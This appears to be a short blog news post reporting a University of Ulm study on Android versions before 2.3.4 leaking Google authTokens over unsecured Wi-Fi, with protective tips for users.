Bad news for Android users! A study shows that 99 percent of Android phones are vulnerable to a security attack which allows hackers to access their Google accounts.
Researchers at the University of Ulm tested Android versions 2.1, 2.2, 2.2.1, 2.3.3, 2.3.4, and 3.0 only to find that devices running anything prior to Android 2.3.4 can easily be compromised with the attack method used. Considering that nearly all Android phones are running software version 2.3.3. and below, this means that about 99 percent of devices are vulnerable.
The way the attack works is that an evildoer would take advantage of a device which is connected to an unsecured Wi-Fi network and snatch up its authTokens — basically secret digital codes used to securely identify you and your device and tell a service that you have permission to access it.
Hackers are able to do this because authTokens are not only being stored on devices for up to two weeks, but also sent over unencrypted connections.
So what can someone do with your authTokens? He or she can pretend to be you — at least in the eyes of a service such as Twitter, Facebook, or Google — and access your accounts easily.
Yes, that's pretty scary, but you shouldn't panic and abandon your Android phone just yet. While nothing is fool-proof, there are steps you can take to protect yourself a little bit. The most important one of those steps: Avoid unprotected, shady, or unknown Wi-Fi networks.
Let me repeat that one more time: Avoid unprotected, shady, or unknown Wi-Fi networks. They're bad news most of the time and it's generally wise to steer clear of them. But if you absolutely must use one, at least "switch off automatic synchronization in the settings menu" of your device. Doing so won't exactly keep you safe, but at least it'll make a tiny difference.
You should also keep an eye out for Android 2.3.4 updates for your devices as those appear to patch up this particular vulnerability.
Update: The folks from the University of Ulm have reached out to clarify that it's specifically Google services — such as Calendar, Contacts,
and Picasa — which can be hijacked using this particular security attack.
and Picasa — which can be hijacked using this particular security attack.
No comments:
Post a Comment